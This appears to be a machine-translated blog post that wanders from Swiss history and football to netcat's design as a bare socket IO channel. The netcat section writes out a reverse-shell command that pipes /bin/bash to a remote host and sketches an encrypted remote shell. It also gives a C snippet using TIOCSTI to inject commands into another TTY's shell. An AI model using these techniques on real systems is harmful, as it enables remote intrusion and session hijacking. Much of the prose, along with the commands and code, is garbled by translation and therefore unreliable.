This is a noisy night, if you want to give a reason, it may be because although I think Spain is not pure, but how can not do for others to set up their own non-opera role it. After the end, I think it's time to play the netcat of the name of the Swiss Army Knife of the Internet. Although the Swiss Army knife and netcat are not necessarily related to small but fine aspects, I would like to make a point about the Swiss, blog, not the paper, not the test report, the divergence is not a problem, and I think in the future, cross-border will be an inevitable trend, Having a cross-border capability is also an inevitable advantage.
Switzerland is a country without history, it is completely the result of 1848 years of political compromise, which also shows why even Nazi Germany has recognized its permanently neutral state status, but does not mean that the people living in this land has no history, since the time of Caesar, here living a free nation, the era of the Romans, It is self-developed under the Gaolu atmosphere, and its history is a history of fusion, separation, struggle and neutrality, but it is undeniable that this land and the people of this land are in the midst of the chaotic medieval Lords, Kings, Shinra Emperors, popes, bishops, municipalities ... In the midst of the fierce melee, which survived, and did not become ruins, until now, it is still one of the most affluent regions, and to see the map, unlike Belgium, the Netherlands, Switzerland is in the siege of a big country, France, Germany, Italy, Austria, the four strongest form the neighboring countries of Switzerland. It can be seen in its history, German, French, Italian (why is there no Austrian language?). Because most of the Austrian people speak German, the aftermath of the Divine Luo, this position is precisely in line with the principle of European balance of powers, so Switzerland can be unscathed as a neutral country escaped the n holocaust, it is the principle of European balance of powers, for the Swiss such a state to create a stable external environment, it can be refined design, Can not be compromised for external pressure, the Swiss Army knife is built in this environment, of course, there are watches. But it would be more Shan if something else came up.
What is it? That's the Nordic gene. If I say that the Nordic gene has contributed to Linux, do you believe it? But in any case, the Nordic gene does play a role. The Nordic, a descendant of a purely marine nation, a descendant of a nation unrelated to the Roman Empire, freed from the shackles of European tradition, far from the remnants of history, living in a world of fairy tales and myths, navigating unfathomable oceans, swinging freely and freely, and the primitive impulses of rules, This is perhaps the greatest trait of the marine nation.
Swiss Army Knife, a Nordic gene with a super gadget, in line with its external self-consistent internal divergence philosophy, how to describe its beauty is not excessive, Nordic gene expression, coupled with small and refined pursuit, it is this trait to the Swiss Army knife created and Linux the same atmosphere ... Of course things do not mean that it is omnipotent, you can not expect to use it to cut the crane's wire rope, and do not imagine it can pry up a truck, in fact, the lack of these functions is the beauty of the Swiss Army knife, that is, it is not chatty, but small and fine, sometimes small and fine philosophy can indeed win. The standard for evaluating a tool is not what it can do, but how easy it is to do what it claims to do. With a Swiss army knife in your hand, you can save a lot of things, in fact any gadget can be built into it, such as a thermometer, compass, scissors, screwdriver, screwdriver, u disk, meter, toothpick, coil ... The subtlety of design is how to put these things in a limited space, and how to not be misused by people, the simple way is that each gadget is only perfect for a function. All right, here's the whole Swiss Army knife, and here's the netcat.
Netcat, small, small, and really small, rather than small, it's not like the Linux kernel, some people claim it can be cut to less than XK, but do you know how much effort this cut people have to pay? If a person who has recently graduated from a job has to be cut, he may have read some code during college, and how many classes he will have to add. The good thing is not how small it can be, but the fact that it cannot be smaller. How small can the Netcat be? In fact, it only provides a socket IO channel, but don't look at it comes with such a small collection of features, not even called a collection, it has extended the scope of the extension to your imagination, and for those who are not good at thinking, it may be just a telnet program, But for a thoughtful person, it can build a secure remote shell. Have you ever thought of using it to build an SSL channel?
Before starting my exploration, a brief overview of the netcat features that can be found online, I will not repeat here, its function points include but not limited to: Probe port is open, port scan, remote copy file, remote copy directory, encrypted transfer data, remote execution shell, Reverse Remote shell ... Why is it that such a small netcat can accomplish so many functions?
The reason is that it only provides a minimal set, that is, an IO channel, as to how to build the data, that is not its responsibility, NETCAT does not assume any format of the data, no constraints on the data, this is different from Telnet, although Telnet is a slightly more general TCP test program, But for data transmission it has a lot of formatting and assumptions, after all, it was initially designed for remote login, in fact, the above functions are almost not netcat completed, netcat just transfer to the end, only that. It's a feat! Just imagine, who in the end is a remote Telnet 23 or SSH must be a TCP client to actively initiate a connection to the TCP server? So what exactly is the sshd going to run on the TCP server? In fact, no one rules, just a remote login, but this implementation of the default behavior, resulting in a lot of remote logins can not be done, because these remote logins are from the outside network to the intranet, and many firewalls do not allow external to the inside of the active access. Use Netcat can do this, in the intranet run a NETCAT client, external network running Netcat Server, and then let/bin/bash cover out Netcat can, this is the pioneering. I'll say why.
If you perform a
netcat-e $pro, after the connection is successful, do you think Netcat will call Fork/exec to execute pro like most programs? Many people will think so, because this is the standard Unix tradition, but Netcat did not do so, but directly in the current NETCAT process exec A pro, this is too fierce, the current netcat this disappeared by pro, then what to do next? Who's going to do the main control? In fact, netcat the control to the pro, before the handover, the Stdin,stdout,stderr redirect to their socket, only that, Netcat left is a socket IO channel, the next Pro program stdin , Stdout,stderr is the socket, in addition, Netcat left no traces, in the execution
netcat 1.2.3.4 1234-e/bin/bash, the implication seems to be executing
/bin/bash Socketstdin socketstdout ...Unfortunately, Unix philosophy does not allow/bin/bash such a program and socket has any connection, then had to use another small program and its combination to simulate the local IO on the network, netcat under the-e parameter in addition to doing this, there is no toxic side effects. If you don't want to completely redirect Stdin,stdout,stderr, for example if you just want to redirect stdin, you can combine symbols such as |,>,< and netcat, such as
netcat-l-P 1234 <./transfile,cat transfile2 |netcat 127.0.0.1 2234And so on, in this case, the netcat itself is still, and does not disappear under the-e parameter, but it does nothing more than IO. Swiss Army knife-like versatility is so, yes, everything lies in your imagination, you can no longer say that this function or the function of the netcat not provided, can not say, should say that you did not think of how it can be used. If I were to write Netcat's manual, I would write a sentence: it provides and only provides a TCP or UDP network channel, which can implement all network functions using TCP or UDP protocol.
I want to implement a remote execution of the command mechanism, do not want to program, and do not want to use SSH, how to do? Using Netcat is very good, first it can implement a DH key exchange, and then encrypt the data to be transferred, and then decrypt, improvised a shell, the execution of the command after the return of the results, encrypted return, these are nothing. If you want to get an encrypted shell remotely, you need to do some work, or you can implement a self-loop pipeline, that is, the final standard output of the command sequence is directed to the standard input of the first command, i.e. Netcat 1.2.3.4 1234|decryto|/bin/bash| [Email protected], the last @ means that the standard output of Encryto is directed to the standard input of netcat, the socket, if you do not want to do so, Then you use the following code sequence to hijack any shell that is already running on a TTY and then execute the command after the capture return value is returned:
int fd = open ("/dev/pts/0", O_RDWR), IOCTL (FD, tiocsti, "L"), IOCTL (FD, Tiocsti, "s") , IOCTL (FD, Tiocsti, "\ n");
But no matter what you do, do not modify netcat, if you really want to modify it, it is not as good as writing a satisfying their own needs, because netcat there is nothing to change, you take it as the following program:
Socket;listenaccept//Note that there is no multi-processing mechanism loop:read;write;loop;
Remember, building a large function with existing gadgets is an art, netcat itself is not a Swiss army knife, it is more like the hilt and scabbard of the Swiss Army knife, can accommodate almost all tools, small is more, the key is tolerant, large inclusive, natural constraints are the least. Netcat fully conforms to the UNIX philosophy.
Is there a Swiss army knife on the network programming tool? I think there is the bio mechanism of OpenSSL, which abstracts the IO process and is similar to the netcat redirect IO process. If netcat in the network environment simulation of the local environment, then bio can be simulated in the network environment, in terms of OpenVPN, data is directly written to the bio, rather than directly write to the socket, this and the netcat process is the opposite, in the absence of network environment, If you want to debug a network program, bio is the tool.
Six in the morning, Spain has lost a period of time, I am not a fanatical fan, is the wind, it is said that tomorrow's Italy vs England will be very exciting.
